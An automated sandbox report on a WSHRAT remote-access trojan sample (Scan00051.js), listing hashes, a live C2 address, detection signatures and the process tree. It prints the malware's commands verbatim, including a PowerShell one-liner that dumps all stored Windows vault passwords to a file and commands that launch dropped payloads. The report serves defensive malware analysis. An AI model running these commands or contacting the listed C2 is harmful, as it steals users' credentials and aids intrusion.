Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    11/10/2021, 06:54

General

  • Target

    Scan00051.js

  • Size

    1006KB

  • MD5

    88cc26a74a561426df5302d399744ffb

  • SHA1

    defaafa787d512c1bd654266bbb052965d225e16

  • SHA256

    4ee22add9e3dfc6d9b5f02f56aeebed5944d7b325196c04d935f8093ba3bc301

  • SHA512

    6f5cd63b18c3646b4052f2e895e9bc69db1829fbbc4e86d228d32bc7188f14b130d4ff8427fdc4aa2aa7730d8813ac169752725da26e84aab65a9b00ad02ab0b

Malware Config

Extracted

Family

wshrat

C2

http://147.182.241.104:7121

Signatures

  • WSHRAT

    WSHRAT is a variant of the Houdini worm and exists in both VBS and JS variants.

  • suricata: ET MALWARE WSHRAT CnC Checkin

  • suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

  • suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

  • Blocklisted process makes network request 23 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 26 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 21 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan00051.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:3432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:1276
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2280
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3516
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2000
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook accounts
      PID:4092
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
      PID:2980
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
    1⤵
    PID:1432

Network

MITRE ATT&CK Enterprise v6

Downloads
